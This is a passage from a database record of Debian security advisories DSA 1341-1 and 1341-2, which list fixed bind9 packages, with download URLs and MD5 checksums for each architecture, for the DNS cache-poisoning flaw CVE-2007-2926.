http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 553466 7a6494a6bd042ccf5df4d99d6c5c2542\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 186922 83db82dca4032d2326be7b1bb8624d19\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 95958 76cf006f35ab0fe0d5db1bea77902e7c\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 110608 099dbfa728bbd0ba230362327b96af33\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 113880 b90a561a40975ea4cddd3f59dc2d5a6b\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 223960 34ce7a0693aadc21ece63efc42717dc3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 311286 ddc9ebd93f06b76792798a6a5bc01d34\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 115332 36e51f58ed0be288c2ab066bd0e1e763\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 187714 7ade5d593bef956f1dd7769c29f6551f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 1257768 dcffd2d0af9262b3b3c2d1b8166d9c65\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 96256 c10cd5cc0d827b485e7a6b1d06342992\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 545018 c8a2f5a0a086a858ce4ae4e9c096d28c\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 185090 039d93f2286fa4974c360745f6e7ec89\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 96074 98b897d5f0c8ff086514d86801122d30\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 112556 16330ecebbd5be5dcfbfa7acb67c89aa\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 113746 ccb0abb76e39395ec051eac5b10ab3bb\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 216754 94ea9e9fc614f3ae44e184d4a070dee8\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 294096 a54d3779c21bc3d3ea13b8991aedd55c\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 112686 91b9f6ad1fe1d3bed4473e844060755d\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 180052 acdaa5225d7a8a46dfa018d33b85917f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 995710 8d44e9f8b65868d201cc0593c035a0b2\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 94040 208d791ca231d336850b8526b61dc547\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 473758 f0ca4e1c62970bcdb4ca0e4fec82bd20\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 168910 f1be1c9a61bb8c1a7b28a73144a0febc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 94014 3927f50039cb5a3815d37ee60b8f0805\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 105664 24dd5215d1eb5aabe10f68bd379dfbf5\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 109552 9211a8f796f460cb1674ad233f99f0b8\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 206122 5f581d25b7eac5d9924633c48374cfd9\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 392704 fbb60f8a53e1df4370f6b1fa04dcaa7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 125346 d7b91c0fd8c935dc80d5c2f10dfb71cd\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 215892 d8b6b3e6a35d326074763dcb6f2a02d1\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 1585738 f246e3455fdcc4bede6aaa4feb7e5a4c\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 99586 a6a90361dbe16b55fac090b6221bb2b6\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 742434 2d827017a7f76dbaae60ac1c827c7375\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 231552 8968c74dabdb69eeb4091e8a8d4b2139\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 102034 da5aec0bfc2e2f8c659f563a8774596a\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 117356 99c85d5fd4b7790a8a3fbe0b66c55ce8\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 127150 3f764e3176185b773ddfa988105dce93\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 280214 ca7ba1f13de17522a302538390731a11\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 298960 386cfb4312bfed69a2ed12304609a3ed\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 112532 92eb6f06d4a18dca899f5d23caddea3b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 179148 4ca657710b1071bac2ebd2a27ac1122c\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 1206278 03496e479c5e92c1e4e6bbb63c54f73b\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 93742 cb50eb9cce7422e8879aa796dfdb7b8d\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 489944 ab86bfaff22e47af0bfd3fc57c0db801\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 173664 03c3008a5493f50b453ac239e843a5db\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 94564 5c1aab5f8cee9fac9e678737b5171ecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 106766 7d53ee8d69117fdde48a1074cfdd3f1b\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 109844 13abaab553f3c76403b948fea9d0cc1c\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 210372 4bdb416e4876166765b8aa3987d8e339\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 300740 b8f07903829e88e7dd495cb0866a1be4\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 113376 20cdab8f8babc1e60bcc6e34824be459\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 182824 7eb696a4324c5ad3f8b403a977c62c55\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 1169274 289ca4f005063dec3ad819896ba0afb1\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 95760 ca5d0db4143552b8570c766acea14a71\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 490474 ef3bc644324fd9293b8f132e3bdf6eef\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 173214 49a7fec7735be2fa5143280197d2e34d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 95768 6970420c1ca23d748ed7bdf9efc029e1\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 108868 a0be0fc5c4c666348cc11d3502fa8a30\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 111876 899a074f3970c21cb97e2d0b5a3b3606\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 206322 24bce060644edb83c85a83e1c0d81087\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 331352 1d686878f52e8d8a3a1a10dd5d1eeae2\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 117686 53039a718a231df07de1020ae4062d04\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 194230 4fefe9085f9c27fd11f63b944ebe1583\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 1138900 d511892e9f7b30f034d30d9b10722f67\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 95298 6f5505c5815bd05d5acca2a7bc918f52\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 581310 338f8914e14bfdc50835252d76f0fd42\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 196206 543df937ea45c7b5f784c1c952a7f5e0\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 97416 fa1af3cf8a7416f3ed5b7d42c836b8b2\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 113884 2ec66079b2d2e11cf897f0977729a4c1\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 116232 f5fa31d37e78bbb36f73d53da5da27ea\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 233484 1dffc0d674f30381bbe5a7ffdbc30518\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 299544 d87837fe5a3f20c6a14fdf3318dd2262\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 113810 f403041c08435061da227325811fa162\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 183572 8af8396c1de389c5d59c043f957f6ffc\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 1122852 f127cc8eaf19ea1afc0e75d95dddfe01\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 94460 5a3a6e60c48ea5a2430852e8f0bdccde\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 495516 6be9e70176aea0f4103f66638d1ddb4e\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 174856 af7512793320752e3607994adcdf5192\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 94450 607818b14e52d297085cf59f207afce7\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 107158 67c296d0d2ca2bd11260b9433bb8b444\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 110702 0237570eab7e9344b78728b6ff4c3a55\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 210042 3d5b39b5e149149d314c3d3b0693e057\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2007-07-25T00:00:00", "published": "2007-07-25T00:00:00", "id": "DEBIAN:DSA-1341-1:6D610", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00102.html", "title": "[SECURITY] [DSA 1341-1] New bind9 packages fix DNS cache poisoning", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:29:39", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1341-2 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 25th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : design error\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-2926\n\nThis update provides fixed packages for the oldstable distribution (sarge).\nFor reference the original advisory text:\n\nAmit Klein discovered that the BIND name server generates predictable \nDNS query IDs, which may lead to cache poisoning attacks.\n\nFor the oldstable distribution (sarge) this problem has been fixed in\nversion 9.2.4-1sarge3. An update for mips, powerpc and hppa is not yet\navailable, they will be released soon.\n\nFor the stable distribution (etch) this problem has been fixed in\nversion 9.3.4-2etch1. An update for mips is not yet available, it will\nbe released soon.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your BIND packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3.dsc\n Size/MD5 checksum: 741 1fa2bc8b46a0411cd491c0473105a342\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3.diff.gz\n Size/MD5 checksum: 101841 7adc3b3d1c7c87908a73e7d2456985bb\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4.orig.tar.gz\n Size/MD5 checksum: 4564219 2ccbddbab59aedd6b8711b628b5472bd\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.2.4-1sarge3_all.deb\n Size/MD5 checksum: 156958 0340dcd085472e06ec9dad363f80ebeb\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 308078 52d70058f6114eece5f5429dd774fef4\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 96950 e057773683872381ec4eff92b14ffcf6\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 169214 c8153e9d86913b5a6c0778b4d73fe4b4\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 1314552 287a71bed4089bb89edd55f6cb27b62b\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 523154 6bb71bf02b9d4ef3931745364a97cc19\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 174190 cc8e2d01bd5abac2cb92b3c9e7962c44\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 79570 5ab2753f2227cccf90a59c24bb1eb9c0\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 94594 136cd50cd8fbc6d9073693938f275d0a\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 97340 99b0751983bf6eef090692e133d0d519\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_alpha.deb\n Size/MD5 checksum: 199658 7cfc1d3c2ea61adb79dddb1f1568c907\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 288568 5a5f821c4dfe9e919750ec7877223451\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 95946 95faedc2186f40293c46821da0d2ffea\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 165168 a9bdb7b12d44748be590bf6292b18aba\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 1014760 0f682e95f084eff609e65adde4439164\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 490234 3192c3d956d3df8c51e588c45016b0f3\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 164636 81d26e56129ecfc15b6c04111ee83cf0\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 77788 e1023188998136ff2074715294a10382\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 92944 c8e8fb8b6a9bd83fefdc7e9226c7c5d2\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 94100 947534b00f400b9b6641311b900a0885\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_amd64.deb\n Size/MD5 checksum: 189188 4cc765360a8d21a8e89daa945eb7453d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 277680 cd73ff3c5836ad027e7950069eba547b\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 94084 fa42a6ccbf21ab98f6644a9b3c810282\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 159414 c27c24aaaef0522bac121b8872ba45a7\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 1037426 c41b93ea46c61cd13b1928791727eb7b\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 466072 4ae4a53402cad3cfba45bb3b5d249d0a\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 156826 17f390940fbb0bf6c3866d4039309cc7\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 75764 1574925a0914296854fc8830aeeccdbd\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 88304 f3c1e1a88b7efb2e6bd9f7b00c7c1e74\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 90420 869829ed274cbdfa154e6577e7e4e004\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_arm.deb\n Size/MD5 checksum: 182628 d578739558bc697c16327f42ddf26978\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 276544 64ca5ef977558b9285edf566a94814cd\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 93858 597a51f25f9fd80d7caabc1769d31c1d\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 158670 70d5cd53971f696002b8442900eae50a\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 955636 ed02b89b85afd0a0673b6cd5da14b851\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 459738 bf2027e9d8f0c7248d5b9c2ff9456363\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 154000 2f168be9dc8375bfa1e3ff3fae2a6a63\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 76272 c539fdb6acc7b6ed46a39fa153eab1c5\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 88566 663bea9b196c95975cce3bedc955d95d\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 91854 360f7264f25229d894e7f54d2823d15f\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_i386.deb\n Size/MD5 checksum: 182562 dbe15064e007ab38e99b0a6fc9cca0fa\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 358644 a754395fd648e5c642d12a7b27d4dc82\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 104626 e47db0abd3cfd6f035594d925969bc69\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 191392 562e8742d24370c60d36ea49557fbb0d\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 1405690 d7a5752eb04244d32957081d9f375c33\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 657200 ba6610c115c2849b0df040e6c1a272e8\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 202876 2c390be4f29c6d1ab68c86b36a8edee0\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 82884 1f1d72e68809277b3bc16f91770a6155\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 100614 77e8658ddd7febb0712161c1b2e6844a\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 105584 b6bb791654abf1420fb9e84cb12f91c6\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_ia64.deb\n Size/MD5 checksum: 237662 227f7ab1aab61f504fe8315f63db2e44\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 262742 8804d245acdb74f7b4d52a99ebbe05ee\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 91962 8c9b8e70c7a61f9a1d2b40c85c466024\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 153920 7a62c842594b54c382f6de26b40a6784\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 880446 f0fb1e744f4052ce1476e1f39a2dd853\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 417972 2971a9046d321176516cc4191efd96dd\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 147238 dbf8c047ab65840729bb47c79a11267f\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 75328 5d3ab93eb0a80115f3c9d2f2ddf50e31\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 89690 dc26bf251ef1ea03e8057f20d477cc63\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 89716 9159b8ca3841f135c76f69f539314428\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_m68k.deb\n Size/MD5 checksum: 169830 81596024ee2ab158a66e5ea60e3dc1b7\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 288634 698e8151d8eadb2c947bf3fd0b93975d\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 92098 a1ce6e0be88dd7cd3f3d6cd47c39b2f8\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 154670 7dc88e61a2bace9d60562b98f41bd2f9\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 1088552 ed78389c8c1ac12e05f6862db19dfd84\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 455626 9a5eb8f661633ccb926902887552ede5\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 156872 5e2453f485ff3b1d3a6cc7053c58e518\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 76710 d7d15da3372ef950bacfe70c24d8db6b\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 89612 57ae2447f221b40755c3dc0cdb8ac794\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 91652 32a7ed0dd85de81ba1caf47cb2389a46\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_mipsel.deb\n Size/MD5 checksum: 181660 bc84952a85fba07b444ffe9ba3afa861\n\n IBM S/390 architecture:\n\n 